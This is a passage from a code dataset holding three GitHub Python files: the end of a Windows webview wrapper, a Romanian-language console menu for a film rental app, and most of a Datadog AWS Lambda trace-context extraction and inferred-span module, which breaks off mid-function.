web.Width = width\r\n web.Height = height\r\n \r\n def _before_window(self, sender, e):\r\n \"\"\"\r\n A handler.\r\n \r\n :param sender: Sender.\r\n :param e: E.\r\n :return: None\r\n \"\"\"\r\n href = sender.Document.ActiveElement.GetAttribute('href')\r\n self.set_url(href)\r\n e.Cancel = True\r\n \r\n def _move(self):\r\n _user32.MoveWindow(self.ie_hwnd, self.x, self.y, self.width, self.height, True)\r\n \r\n @property\r\n def pos(self):\r\n return self.x, self.y\r\n \r\n @pos.setter\r\n def pos(self, set_pos: Tuple[int, int]):\r\n self.x, self.y = set_pos\r\n self._move()\r\n\r\n def set_url(self, url: str):\r\n \"\"\"\r\n Set the URL of this webview.\r\n \r\n :param url: URL.\r\n :return: None\r\n \"\"\"\r\n self.url = url\r\n self.ie.Navigate(url)\r\n \r\n def show_url(self, func: Callable[[], Any]):\r\n \"\"\"\r\n A decorator to decorate a callback function when change URL.\r\n \r\n Warning: this is the test function, it is unstable!\r\n\r\n :param func: Callback function.\r\n :return: None\r\n \"\"\"\r\n self.ie.Navigating += func\r\n \r\n def resize(self, width: int, height: int):\r\n \"\"\"\r\n Resize webview.\r\n \r\n :param width: Width.\r\n :param height: Height.\r\n :return: None\r\n \"\"\"\r\n self.width, self.height = width, height\r\n self.ie.Width = width\r\n self.ie.Height = height\r\n \r\n def destroy(self):\r\n \"\"\"\r\n Destroy this web view.\r\n \r\n :return: None\r\n \"\"\"\r\n self.ie.Dispose()\r\n del self.ie\r\n","repo_name":"stripepython/easyplayer","sub_path":"easyplayer/utils/wintools/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":4676,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"14137879321","text":"\"\"\"\n@@@ Vintila Radu @@@\n\"\"\"\n\nfrom UI.meniu_client import Client_meniu\nfrom UI.meniu_film import Film_meniu\nfrom UI.meniu_inchiriere import Inchiriere_meniu\nfrom UI.meniu_rapoarte import Rapoarte_meniu\n\n\nclass Console:\n def __init__(self, srv_client, srv_film, srv_inc):\n self.__srv_client = srv_client\n self.__srv_film = srv_film\n self.__srv_inc = srv_inc\n\n @staticmethod\n def printeaza_optiuni():\n print('''\n1. Meniu clienti\n2. Meniu filme\n3. Meniu inchirieri\n4. Meniu rapoarte\n0. Iesire aplicatie\n ''')\n\n def show(self):\n while True:\n self.printeaza_optiuni()\n cmd = input(\"Introduceti optiunea dorita: \")\n\n try:\n if cmd == \"0\":\n print(\"Ai iesit din aplicatie!\")\n return\n elif cmd == \"1\":\n Client_meniu(self.__srv_client).afisare()\n elif cmd == \"2\":\n Film_meniu(self.__srv_film).afisare()\n elif cmd == \"3\":\n Inchiriere_meniu(self.__srv_inc).afisare()\n elif cmd == \"4\":\n Rapoarte_meniu(self.__srv_client, self.__srv_film, self.__srv_inc).afisare()\n else:\n print(\"Nu ati introdus o optiune valida!\")\n except ValueError:\n print(\"Nu ati introdus o optiune valida!\")\n except KeyError:\n print(\"Nu ati introdus o optiune valida!\")\n","repo_name":"krotek20/college-ubb-labs","sub_path":"1st year/FP/lab79/UI/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"47762761044","text":"import hashlib\nimport logging\nimport os\nimport json\nimport base64\nfrom datetime import datetime, timezone\nfrom typing import Optional, Dict\n\nfrom datadog_lambda.metric import submit_errors_metric\n\ntry:\n from typing import Literal\nexcept ImportError:\n # Literal was added to typing in python 3.8\n from typing_extensions import Literal\n\nfrom datadog_lambda.constants import (\n SamplingPriority,\n TraceHeader,\n TraceContextSource,\n XrayDaemon,\n Headers,\n)\nfrom datadog_lambda.xray import (\n send_segment,\n parse_xray_header,\n)\nfrom ddtrace import tracer, patch, Span\nfrom ddtrace import __version__ as ddtrace_version\nfrom ddtrace.propagation.http import HTTPPropagator\nfrom datadog_lambda import __version__ as datadog_lambda_version\nfrom datadog_lambda.trigger import (\n _EventSource,\n parse_event_source,\n get_first_record,\n EventTypes,\n EventSubtypes,\n)\n\ndd_trace_otel_enabled = (\n os.environ.get(\"DD_TRACE_OTEL_ENABLED\", \"false\").lower() == \"true\"\n)\nif dd_trace_otel_enabled:\n from opentelemetry.trace import set_tracer_provider\n from ddtrace.opentelemetry import TracerProvider\n\n set_tracer_provider(TracerProvider())\n\n\nlogger = logging.getLogger(__name__)\n\ndd_trace_context = {}\ndd_tracing_enabled = os.environ.get(\"DD_TRACE_ENABLED\", \"false\").lower() == \"true\"\n\npropagator = HTTPPropagator()\n\n\ndef _convert_xray_trace_id(xray_trace_id):\n \"\"\"\n Convert X-Ray trace id (hex)'s last 63 bits to a Datadog trace id (int).\n \"\"\"\n return str(0x7FFFFFFFFFFFFFFF & int(xray_trace_id[-16:], 16))\n\n\ndef _convert_xray_entity_id(xray_entity_id):\n \"\"\"\n Convert X-Ray (sub)segement id (hex) to a Datadog span id (int).\n \"\"\"\n return str(int(xray_entity_id, 16))\n\n\ndef _convert_xray_sampling(xray_sampled):\n \"\"\"\n Convert X-Ray sampled (True/False) to its Datadog counterpart.\n \"\"\"\n return (\n str(SamplingPriority.USER_KEEP)\n if xray_sampled\n else str(SamplingPriority.USER_REJECT)\n )\n\n\ndef _get_xray_trace_context():\n if not is_lambda_context():\n return None\n\n xray_trace_entity = parse_xray_header(\n os.environ.get(XrayDaemon.XRAY_TRACE_ID_HEADER_NAME, \"\")\n )\n if xray_trace_entity is None:\n return None\n trace_context = {\n \"trace-id\": _convert_xray_trace_id(xray_trace_entity.get(\"trace_id\")),\n \"parent-id\": _convert_xray_entity_id(xray_trace_entity.get(\"parent_id\")),\n \"sampling-priority\": _convert_xray_sampling(xray_trace_entity.get(\"sampled\")),\n }\n logger.debug(\n \"Converted trace context %s from X-Ray segment %s\",\n trace_context,\n (\n xray_trace_entity[\"trace_id\"],\n xray_trace_entity[\"parent_id\"],\n xray_trace_entity[\"sampled\"],\n ),\n )\n return trace_context\n\n\ndef _get_dd_trace_py_context():\n span = tracer.current_span()\n if not span:\n return None\n\n parent_id = span.context.span_id\n trace_id = span.context.trace_id\n sampling_priority = span.context.sampling_priority\n logger.debug(\n \"found dd trace context: %s\", (span.context.trace_id, span.context.span_id)\n )\n return {\n \"parent-id\": str(parent_id),\n \"trace-id\": str(trace_id),\n \"sampling-priority\": str(sampling_priority),\n \"source\": TraceContextSource.DDTRACE,\n }\n\n\ndef _context_obj_to_headers(obj):\n return {\n TraceHeader.TRACE_ID: str(obj.get(\"trace-id\")),\n TraceHeader.PARENT_ID: str(obj.get(\"parent-id\")),\n TraceHeader.SAMPLING_PRIORITY: str(obj.get(\"sampling-priority\")),\n }\n\n\ndef create_dd_dummy_metadata_subsegment(\n subsegment_metadata_value, subsegment_metadata_key\n):\n \"\"\"\n Create a Datadog subsegment to pass the Datadog trace context or Lambda function\n tags into its metadata field, so the X-Ray trace can be converted to a Datadog\n trace in the Datadog backend with the correct context.\n \"\"\"\n send_segment(subsegment_metadata_key, subsegment_metadata_value)\n\n\ndef extract_context_from_lambda_context(lambda_context):\n \"\"\"\n Extract Datadog trace context from the `client_context` attr\n from the Lambda `context` object.\n\n dd_trace libraries inject this trace context on synchronous invocations\n \"\"\"\n client_context = lambda_context.client_context\n trace_id = None\n parent_id = None\n sampling_priority = None\n if client_context and client_context.custom:\n if \"_datadog\" in client_context.custom:\n # Legacy trace propagation dict\n dd_data = client_context.custom.get(\"_datadog\", {})\n trace_id = dd_data.get(TraceHeader.TRACE_ID)\n parent_id = dd_data.get(TraceHeader.PARENT_ID)\n sampling_priority = dd_data.get(TraceHeader.SAMPLING_PRIORITY)\n elif (\n TraceHeader.TRACE_ID in client_context.custom\n and TraceHeader.PARENT_ID in client_context.custom\n and TraceHeader.SAMPLING_PRIORITY in client_context.custom\n ):\n # New trace propagation keys\n trace_id = client_context.custom.get(TraceHeader.TRACE_ID)\n parent_id = client_context.custom.get(TraceHeader.PARENT_ID)\n sampling_priority = client_context.custom.get(TraceHeader.SAMPLING_PRIORITY)\n\n return trace_id, parent_id, sampling_priority\n\n\ndef extract_context_from_http_event_or_context(\n event,\n lambda_context,\n event_source: _EventSource,\n decode_authorizer_context: bool = True,\n):\n \"\"\"\n Extract Datadog trace context from the `headers` key in from the Lambda\n `event` object.\n\n Falls back to lambda context if no trace data is found in the `headers`\n \"\"\"\n if decode_authorizer_context:\n is_http_api = event_source.equals(\n EventTypes.API_GATEWAY, subtype=EventSubtypes.HTTP_API\n )\n injected_authorizer_data = get_injected_authorizer_data(event, is_http_api)\n if injected_authorizer_data:\n try:\n # fail fast on any KeyError here\n trace_id = injected_authorizer_data[TraceHeader.TRACE_ID]\n parent_id = injected_authorizer_data[TraceHeader.PARENT_ID]\n sampling_priority = injected_authorizer_data.get(\n TraceHeader.SAMPLING_PRIORITY\n )\n return trace_id, parent_id, sampling_priority\n except Exception as e:\n logger.debug(\n \"extract_context_from_authorizer_event returned with error. \\\n Continue without injecting the authorizer span %s\",\n e,\n )\n\n headers = event.get(\"headers\", {}) or {}\n lowercase_headers = {k.lower(): v for k, v in headers.items()}\n\n trace_id = lowercase_headers.get(TraceHeader.TRACE_ID)\n parent_id = lowercase_headers.get(TraceHeader.PARENT_ID)\n sampling_priority = lowercase_headers.get(TraceHeader.SAMPLING_PRIORITY)\n\n if not trace_id or not parent_id or not sampling_priority:\n return extract_context_from_lambda_context(lambda_context)\n\n return trace_id, parent_id, sampling_priority\n\n\ndef create_sns_event(message):\n return {\n \"Records\": [\n {\n \"EventSource\": \"aws:sns\",\n \"EventVersion\": \"1.0\",\n \"Sns\": message,\n }\n ]\n }\n\n\ndef extract_context_from_sqs_or_sns_event_or_context(event, lambda_context):\n \"\"\"\n Extract Datadog trace context from an SQS event.\n\n The extraction chain goes as follows:\n EB => SQS (First records body contains EB context), or\n SNS => SQS (First records body contains SNS context), or\n SQS or SNS (`messageAttributes` for SQS context,\n `MessageAttributes` for SNS context), else\n Lambda Context.\n\n Falls back to lambda context if no trace data is found in the SQS message attributes.\n \"\"\"\n\n # EventBridge => SQS\n try:\n (\n trace_id,\n parent_id,\n sampling_priority,\n ) = _extract_context_from_eventbridge_sqs_event(event)\n return trace_id, parent_id, sampling_priority\n except Exception:\n logger.debug(\"Failed extracting context as EventBridge to SQS.\")\n\n try:\n first_record = event.get(\"Records\")[0]\n\n # logic to deal with SNS => SQS event\n if \"body\" in first_record:\n body_str = first_record.get(\"body\", {})\n try:\n body = json.loads(body_str)\n if body.get(\"Type\", \"\") == \"Notification\" and \"TopicArn\" in body:\n logger.debug(\"Found SNS message inside SQS event\")\n first_record = get_first_record(create_sns_event(body))\n except Exception:\n first_record = event.get(\"Records\")[0]\n pass\n\n msg_attributes = first_record.get(\n \"messageAttributes\",\n first_record.get(\"Sns\", {}).get(\"MessageAttributes\", {}),\n )\n dd_payload = msg_attributes.get(\"_datadog\", {})\n # SQS uses dataType and binaryValue/stringValue\n # SNS uses Type and Value\n dd_json_data_type = dd_payload.get(\"Type\", dd_payload.get(\"dataType\", \"\"))\n if dd_json_data_type == \"Binary\":\n dd_json_data = dd_payload.get(\n \"binaryValue\",\n dd_payload.get(\"Value\", r\"{}\"),\n )\n dd_json_data = base64.b64decode(dd_json_data)\n elif dd_json_data_type == \"String\":\n dd_json_data = dd_payload.get(\n \"stringValue\",\n dd_payload.get(\"Value\", r\"{}\"),\n )\n else:\n logger.debug(\n \"Datadog Lambda Python only supports extracting trace\"\n \"context from String or Binary SQS/SNS message attributes\"\n )\n dd_data = json.loads(dd_json_data)\n trace_id = dd_data.get(TraceHeader.TRACE_ID)\n parent_id = dd_data.get(TraceHeader.PARENT_ID)\n sampling_priority = dd_data.get(TraceHeader.SAMPLING_PRIORITY)\n\n return trace_id, parent_id, sampling_priority\n except Exception as e:\n logger.debug(\"The trace extractor returned with error %s\", e)\n return extract_context_from_lambda_context(lambda_context)\n\n\ndef _extract_context_from_eventbridge_sqs_event(event):\n \"\"\"\n Extracts Datadog trace context from an SQS event triggered by\n EventBridge.\n\n This is only possible if first record in `Records` contains a\n `body` field which contains the EventBridge `detail` as a JSON string.\n \"\"\"\n try:\n first_record = event.get(\"Records\")[0]\n if \"body\" in first_record:\n body_str = first_record.get(\"body\", {})\n body = json.loads(body_str)\n\n detail = body.get(\"detail\")\n dd_context = detail.get(\"_datadog\")\n trace_id = dd_context.get(TraceHeader.TRACE_ID)\n parent_id = dd_context.get(TraceHeader.PARENT_ID)\n sampling_priority = dd_context.get(TraceHeader.SAMPLING_PRIORITY)\n return trace_id, parent_id, sampling_priority\n except Exception:\n raise\n\n\ndef extract_context_from_eventbridge_event(event, lambda_context):\n \"\"\"\n Extract datadog trace context from an EventBridge message's Details.\n This is only possible if Details is a JSON string.\n \"\"\"\n try:\n detail = event.get(\"detail\")\n dd_context = detail.get(\"_datadog\")\n if not dd_context:\n return extract_context_from_lambda_context(lambda_context)\n trace_id = dd_context.get(TraceHeader.TRACE_ID)\n parent_id = dd_context.get(TraceHeader.PARENT_ID)\n sampling_priority = dd_context.get(TraceHeader.SAMPLING_PRIORITY)\n return trace_id, parent_id, sampling_priority\n except Exception as e:\n logger.debug(\"The trace extractor returned with error %s\", e)\n return extract_context_from_lambda_context(lambda_context)\n\n\ndef extract_context_from_kinesis_event(event, lambda_context):\n \"\"\"\n Extract datadog trace context from a Kinesis Stream's base64 encoded data string\n \"\"\"\n try:\n record = get_first_record(event)\n data = record.get(\"kinesis\", {}).get(\"data\", None)\n if data:\n b64_bytes = data.encode(\"ascii\")\n str_bytes = base64.b64decode(b64_bytes)\n data_str = str_bytes.decode(\"ascii\")\n data_obj = json.loads(data_str)\n dd_ctx = data_obj.get(\"_datadog\")\n\n if not dd_ctx:\n return extract_context_from_lambda_context(lambda_context)\n\n trace_id = dd_ctx.get(TraceHeader.TRACE_ID)\n parent_id = dd_ctx.get(TraceHeader.PARENT_ID)\n sampling_priority = dd_ctx.get(TraceHeader.SAMPLING_PRIORITY)\n return trace_id, parent_id, sampling_priority\n except Exception as e:\n logger.debug(\"The trace extractor returned with error %s\", e)\n return extract_context_from_lambda_context(lambda_context)\n\n\ndef _deterministic_md5_hash(s: str) -> str:\n \"\"\"MD5 here is to generate trace_id, not for any encryption.\"\"\"\n hex_number = hashlib.md5(s.encode(\"ascii\")).hexdigest()\n binary = bin(int(hex_number, 16))\n binary_str = str(binary)\n binary_str_remove_0b = binary_str[2:].rjust(128, \"0\")\n most_significant_64_bits_without_leading_1 = \"0\" + binary_str_remove_0b[1:-64]\n result = str(int(most_significant_64_bits_without_leading_1, 2))\n if result == \"0\" * 64:\n return \"1\"\n return result\n\n\ndef extract_context_from_step_functions(event, lambda_context):\n \"\"\"\n Only extract datadog trace context when Step Functions Context Object is injected\n into lambda's event dict.\n \"\"\"\n try:\n execution_id = event.get(\"Execution\").get(\"Id\")\n state_name = event.get(\"State\").get(\"Name\")\n state_entered_time = event.get(\"State\").get(\"EnteredTime\")\n trace_id = _deterministic_md5_hash(execution_id)\n parent_id = _deterministic_md5_hash(\n execution_id + \"#\" + state_name + \"#\" + state_entered_time\n )\n sampling_priority = SamplingPriority.AUTO_KEEP\n return trace_id, parent_id, sampling_priority\n except Exception as e:\n logger.debug(\"The Step Functions trace extractor returned with error %s\", e)\n return extract_context_from_lambda_context(lambda_context)\n\n\ndef extract_context_custom_extractor(extractor, event, lambda_context):\n \"\"\"\n Extract Datadog trace context using a custom trace extractor function\n \"\"\"\n try:\n (\n trace_id,\n parent_id,\n sampling_priority,\n ) = extractor(event, lambda_context)\n return trace_id, parent_id, sampling_priority\n except Exception as e:\n logger.debug(\"The trace extractor returned with error %s\", e)\n\n return None, None, None\n\n\ndef is_authorizer_response(response) -> bool:\n try:\n return (\n response is not None\n and response[\"principalId\"]\n and response[\"policyDocument\"]\n )\n except (KeyError, AttributeError):\n pass\n except Exception as e:\n logger.debug(\"unknown error while checking is_authorizer_response %s\", e)\n return False\n\n\ndef get_injected_authorizer_data(event, is_http_api) -> dict:\n try:\n authorizer_headers = event.get(\"requestContext\", {}).get(\"authorizer\")\n if not authorizer_headers:\n return None\n\n dd_data_raw = (\n authorizer_headers.get(\"lambda\", {}).get(\"_datadog\")\n if is_http_api\n else authorizer_headers.get(\"_datadog\")\n )\n\n if not dd_data_raw:\n return None\n\n injected_data = json.loads(base64.b64decode(dd_data_raw))\n\n # Lambda authorizer's results can be cached. But the payload will still have the injected\n # data in cached requests. How to distinguish cached case and ignore the injected data ?\n # APIGateway automatically injects a integrationLatency data in some cases. If it's >0 we\n # know that it's not cached. But integrationLatency is not available for Http API case. In\n # that case, we use the injected Authorizing_Request_Id to tell if it's cached. But token\n # authorizers don't pass on the requestId. The Authorizing_Request_Id can't work for all\n # cases neither. As a result, we combine both methods as shown below.\n if authorizer_headers.get(\"integrationLatency\", 0) > 0 or event.get(\n \"requestContext\", {}\n ).get(\"requestId\") == injected_data.get(Headers.Authorizing_Request_Id):\n return injected_data\n else:\n return None\n\n except Exception as e:\n logger.debug(\"Failed to check if invocated by an authorizer. error %s\", e)\n return None\n\n\ndef extract_dd_trace_context(\n event, lambda_context, extractor=None, decode_authorizer_context: bool = True\n):\n \"\"\"\n Extract Datadog trace context from the Lambda `event` object.\n\n Write the context to a global `dd_trace_context`, so the trace\n can be continued on the outgoing requests with the context injected.\n \"\"\"\n global dd_trace_context\n trace_context_source = None\n event_source = parse_event_source(event)\n\n if extractor is not None:\n (\n trace_id,\n parent_id,\n sampling_priority,\n ) = extract_context_custom_extractor(extractor, event, lambda_context)\n elif isinstance(event, (set, dict)) and \"headers\" in event:\n (\n trace_id,\n parent_id,\n sampling_priority,\n ) = extract_context_from_http_event_or_context(\n event, lambda_context, event_source, decode_authorizer_context\n )\n elif event_source.equals(EventTypes.SNS) or event_source.equals(EventTypes.SQS):\n (\n trace_id,\n parent_id,\n sampling_priority,\n ) = extract_context_from_sqs_or_sns_event_or_context(event, lambda_context)\n elif event_source.equals(EventTypes.EVENTBRIDGE):\n (\n trace_id,\n parent_id,\n sampling_priority,\n ) = extract_context_from_eventbridge_event(event, lambda_context)\n elif event_source.equals(EventTypes.KINESIS):\n (\n trace_id,\n parent_id,\n sampling_priority,\n ) = extract_context_from_kinesis_event(event, lambda_context)\n elif event_source.equals(EventTypes.STEPFUNCTIONS):\n (\n trace_id,\n parent_id,\n sampling_priority,\n ) = extract_context_from_step_functions(event, lambda_context)\n else:\n trace_id, parent_id, sampling_priority = extract_context_from_lambda_context(\n lambda_context\n )\n\n if trace_id and parent_id and sampling_priority:\n logger.debug(\"Extracted Datadog trace context from event or context\")\n metadata = {\n \"trace-id\": trace_id,\n \"parent-id\": parent_id,\n \"sampling-priority\": sampling_priority,\n }\n dd_trace_context = metadata.copy()\n trace_context_source = TraceContextSource.EVENT\n else:\n # AWS Lambda runtime caches global variables between invocations,\n # reset to avoid using the context from the last invocation.\n dd_trace_context = _get_xray_trace_context()\n if dd_trace_context:\n trace_context_source = TraceContextSource.XRAY\n logger.debug(\"extracted dd trace context %s\", dd_trace_context)\n return dd_trace_context, trace_context_source, event_source\n\n\ndef get_dd_trace_context():\n \"\"\"\n Return the Datadog trace context to be propagated on the outgoing requests.\n\n If the Lambda function is invoked by a Datadog-traced service, a Datadog\n trace context may already exist, and it should be used. Otherwise, use the\n current X-Ray trace entity, or the dd-trace-py context if DD_TRACE_ENABLED is true.\n\n Most of widely-used HTTP clients are patched to inject the context\n automatically, but this function can be used to manually inject the trace\n context to an outgoing request.\n \"\"\"\n if dd_tracing_enabled:\n dd_trace_py_context = _get_dd_trace_py_context()\n if dd_trace_py_context is not None:\n return _context_obj_to_headers(dd_trace_py_context)\n\n global dd_trace_context\n\n try:\n xray_context = _get_xray_trace_context() # xray (sub)segment\n except Exception as e:\n logger.debug(\n \"get_dd_trace_context couldn't read from segment from x-ray, with error %s\"\n % e\n )\n if not xray_context:\n return {}\n\n if not dd_trace_context:\n return _context_obj_to_headers(xray_context)\n\n context = dd_trace_context.copy()\n context[\"parent-id\"] = xray_context.get(\"parent-id\")\n logger.debug(\"Set parent id from xray trace context: %s\", context.get(\"parent-id\"))\n\n return _context_obj_to_headers(context)\n\n\ndef set_correlation_ids():\n \"\"\"\n Create a dummy span, and overrides its trace_id and span_id, to make\n ddtrace.helpers.get_log_correlation_context() return a dict containing the correct ids for both\n auto and manual log correlations.\n\n TODO: Remove me when Datadog tracer is natively supported in Lambda.\n \"\"\"\n if not is_lambda_context():\n logger.debug(\"set_correlation_ids is only supported in LambdaContext\")\n return\n if dd_tracing_enabled:\n logger.debug(\"using ddtrace implementation for spans\")\n return\n\n context = get_dd_trace_context()\n if not context:\n return\n\n span = tracer.trace(\"dummy.span\")\n span.trace_id = int(context[TraceHeader.TRACE_ID])\n span.span_id = int(context[TraceHeader.PARENT_ID])\n\n logger.debug(\"correlation ids set\")\n\n\ndef inject_correlation_ids():\n \"\"\"\n Override the formatter of LambdaLoggerHandler to inject datadog trace and\n span id for log correlation.\n\n For manual injections to custom log handlers, use `ddtrace.helpers.get_log_correlation_context`\n to retrieve a dict containing correlation ids (trace_id, span_id).\n \"\"\"\n # Override the log format of the AWS provided LambdaLoggerHandler\n root_logger = logging.getLogger()\n for handler in root_logger.handlers:\n if (\n handler.__class__.__name__ == \"LambdaLoggerHandler\"\n and type(handler.formatter) == logging.Formatter\n ):\n handler.setFormatter(\n logging.Formatter(\n \"[%(levelname)s]\\t%(asctime)s.%(msecs)dZ\\t%(aws_request_id)s\\t\"\n \"[dd.trace_id=%(dd.trace_id)s dd.span_id=%(dd.span_id)s]\\t%(message)s\\n\",\n \"%Y-%m-%dT%H:%M:%S\",\n )\n )\n\n # Patch `logging.Logger.makeRecord` to actually inject correlation ids\n patch(logging=True)\n\n logger.debug(\"logs injection configured\")\n\n\ndef is_lambda_context():\n \"\"\"\n Return True if the X-Ray context is `LambdaContext`, rather than the\n regular `Context` (e.g., when testing lambda functions locally).\n \"\"\"\n return os.environ.get(XrayDaemon.FUNCTION_NAME_HEADER_NAME, \"\") != \"\"\n\n\ndef set_dd_trace_py_root(trace_context_source, merge_xray_traces):\n if trace_context_source == TraceContextSource.EVENT or merge_xray_traces:\n context = dict(dd_trace_context)\n if merge_xray_traces:\n xray_context = _get_xray_trace_context()\n if xray_context is not None:\n context[\"parent-id\"] = xray_context.get(\"parent-id\")\n\n headers = _context_obj_to_headers(context)\n span_context = propagator.extract(headers)\n tracer.context_provider.activate(span_context)\n logger.debug(\n \"Set dd trace root context to: %s\",\n (span_context.trace_id, span_context.span_id),\n )\n\n\ndef create_inferred_span(\n event,\n context,\n event_source: _EventSource = None,\n decode_authorizer_context: bool = True,\n):\n if event_source is None:\n event_source = parse_event_source(event)\n try:\n if event_source.equals(\n EventTypes.API_GATEWAY, subtype=EventSubtypes.API_GATEWAY\n ):\n logger.debug(\"API Gateway event detected. Inferring a span\")\n return create_inferred_span_from_api_gateway_event(\n event, context, decode_authorizer_context\n )\n elif event_source.equals(EventTypes.LAMBDA_FUNCTION_URL):\n logger.debug(\"Function URL event detected. Inferring a span\")\n return create_inferred_span_from_lambda_function_url_event(event, context)\n elif event_source.equals(\n EventTypes.API_GATEWAY, subtype=EventSubtypes.HTTP_API\n ):\n logger.debug(\"HTTP API event detected. Inferring a span\")\n return create_inferred_span_from_http_api_event(\n event, context, decode_authorizer_context\n )\n elif event_source.equals(\n EventTypes.API_GATEWAY, subtype=EventSubtypes.WEBSOCKET\n ):\n logger.debug(\"API Gateway Websocket event detected. Inferring a span\")\n return create_inferred_span_from_api_gateway_websocket_event(\n event, context, decode_authorizer_context\n )\n elif event_source.equals(EventTypes.SQS):\n logger.debug(\"SQS event detected. Inferring a span\")\n return create_inferred_span_from_sqs_event(event, context)\n elif event_source.equals(EventTypes.SNS):\n logger.debug(\"SNS event detected. Inferring a span\")\n return create_inferred_span_from_sns_event(event, context)\n elif event_source.equals(EventTypes.KINESIS):\n logger.debug(\"Kinesis event detected. Inferring a span\")\n return create_inferred_span_from_kinesis_event(event, context)\n elif event_source.equals(EventTypes.DYNAMODB):\n logger.debug(\"Dynamodb event detected. Inferring a span\")\n return create_inferred_span_from_dynamodb_event(event, context)\n elif event_source.equals(EventTypes.S3):\n logger.debug(\"S3 event detected. Inferring a span\")\n return create_inferred_span_from_s3_event(event, context)\n elif event_source.equals(EventTypes.EVENTBRIDGE):\n logger.debug(\"Eventbridge event detected. Inferring a span\")\n return create_inferred_span_from_eventbridge_event(event, context)\n except Exception as e:\n logger.debug(\n \"Unable to infer span. Detected type: %s. Reason: %s\",\n event_source.to_string(),\n e,\n )\n return None\n logger.debug(\"Unable to infer a span: unknown event type\")\n return None\n\n\ndef create_service_mapping(val):\n new_service_mapping = {}\n for entry in val.split(\",\"):\n parts = entry.split(\":\")\n if len(parts) == 2:\n key = parts[0].strip()\n value = parts[1].strip()\n if key != value and key and value:\n new_service_mapping[key] = value\n return new_service_mapping\n\n\ndef determine_service_name(service_mapping, specific_key, generic_key, default_value):\n service_name = service_mapping.get(specific_key)\n if service_name is None:\n service_name = service_mapping.get(generic_key, default_value)\n return service_name\n\n\nservice_mapping = {}\n# Initialization code\nservice_mapping_str = os.getenv(\"DD_SERVICE_MAPPING\", \"\")\nservice_mapping = create_service_mapping(service_mapping_str)\n\n\ndef create_inferred_span_from_lambda_function_url_event(event, context):\n request_context = event.get(\"requestContext\")\n api_id = request_context.get(\"apiId\")\n domain = request_context.get(\"domainName\")\n service_name = determine_service_name(service_mapping, api_id, \"lambda_url\", domain)\n method = request_context.get(\"http\", {}).get(\"method\")\n path = request_context.get(\"http\", {}).get(\"path\")\n resource = \"{0} {1}\".format(method, path)\n tags = {\n \"operation_name\": \"aws.lambda.url\",\n \"http.url\": domain + path,\n \"endpoint\": path,\n \"http.method\": method,\n \"resource_names\": domain + path,\n \"request_id\": context.aws_request_id,\n }\n request_time_epoch = request_context.get(\"timeEpoch\")\n args = {\n \"service\": service_name,\n \"resource\": resource,\n \"span_type\": \"http\",\n }\n tracer.set_tags(\n {\"_dd.origin\": \"lambda\"}\n ) # function urls don't count as lambda_inferred,\n # because they're in the same service as the inferring lambda function\n span = tracer.trace(\"aws.lambda.url\", **args)\n InferredSpanInfo.set_tags(tags, tag_source=\"self\", synchronicity=\"sync\")\n if span:\n span.set_tags(tags)\n span.start = request_time_epoch / 1000\n return span\n\n\ndef is_api_gateway_invocation_async(event):\n return event.get(\"headers\", {}).get(\"X-Amz-Invocation-Type\") == \"Event\"\n\n\ndef insert_upstream_authorizer_span(\n kwargs_to_start_span, other_tags_for_span, start_time_ns, finish_time_ns\n):\n \"\"\"Insert the authorizer span.\n Without this: parent span --child-> inferred span\n With this insertion: parent span --child-> upstreamAuthorizerSpan --child-> inferred span\n\n Args:\n kwargs_to_start_span (Dict): the same keyword arguments used for the inferred span\n other_tags_for_span (Dict): the same tag keyword arguments used for the inferred span\n start_time_ns (int): the start time of the span in nanoseconds\n finish_time_ns (int): the finish time of the sapn in nanoseconds\n \"\"\"\n trace_ctx = tracer.current_trace_context()\n upstream_authorizer_span = tracer.trace(\n \"aws.apigateway.authorizer\", **kwargs_to_start_span\n )\n upstream_authorizer_span.set_tags(other_tags_for_span)\n upstream_authorizer_span.set_tag(\"operation_name\", \"aws.apigateway.authorizer\")\n # always sync for the authorizer invocation\n InferredSpanInfo.set_tags_to_span(upstream_authorizer_span, synchronicity=\"sync\")\n upstream_authorizer_span.start_ns = int(start_time_ns)\n upstream_authorizer_span.finish(finish_time_ns / 1e9)\n # trace context needs to be set again as it is reset by finish()\n tracer.context_provider.activate(trace_ctx)\n return upstream_authorizer_span\n\n\ndef process_injected_data(event, request_time_epoch_ms, args, tags):\n \"\"\"\n This covers the ApiGateway RestAPI and Websocket cases. It doesn't cover Http API cases.\n \"\"\"\n injected_authorizer_data = get_injected_authorizer_data(event, False)\n if injected_authorizer_data:\n try:\n start_time_ns = int(\n injected_authorizer_data.get(Headers.Parent_Span_Finish_Time)\n )\n finish_time_ns = (\n request_time_epoch_ms\n + (\n int(\n event[\"requestContext\"][\"authorizer\"].get(\n \"integrationLatency\", 0\n )\n )\n )\n ) * 1e6\n upstream_authorizer_span = insert_upstream_authorizer_span(\n args, tags, start_time_ns, finish_time_ns\n )\n return upstream_authorizer_span, finish_time_ns\n except Exception as e:\n logger.debug(\n \"Unable to insert authorizer span. Continue to generate the main span.\\\n Reason: %s\",\n e,\n )\n return None, None\n else:\n return None, None\n\n\ndef create_inferred_span_from_api_gateway_websocket_event(\n event, context, decode_authorizer_context: bool = True\n):\n request_context = event.get(\"requestContext\")\n domain = request_context.get(\"domainName\")\n endpoint = request_context.get(\"routeKey\")\n api_id = request_context.get(\"apiId\")\n\n service_name = determine_service_name(\n service_mapping, api_id, \"lambda_api_gateway\", domain\n )\n tags = {\n \"operation_name\": \"aws.apigateway.websocket\",\n \"http.url\": domain + endpoint,\n \"endpoint\": endpoint,\n \"resource_names\": endpoint,\n \"apiid\": api_id,\n \"apiname\": api_id,\n \"stage\": request_context.get(\"stage\"),\n \"request_id\": context.aws_request_id,\n \"connection_id\": request_context.get(\"connectionId\"),\n \"event_type\": request_context.get(\"eventType\"),\n \"message_direction\": request_context.get(\"messageDirection\"),\n }\n request_time_epoch_ms = int(request_context.get(\"requestTimeEpoch\"))\n if is_api_gateway_invocation_async(event):\n InferredSpanInfo.set_tags(tags, tag_source=\"self\", synchronicity=\"async\")\n else:\n InferredSpanInfo.set_tags(tags, tag_source=\"self\", synchronicity=\"sync\")\n args = {\n \"service\": service_name,\n \"resource\": endpoint,\n \"span_type\": \"web\",\n }\n tracer.set_tags({\"_dd.origin\": \"lambda\"})\n upstream_authorizer_span = None\n finish_time_ns 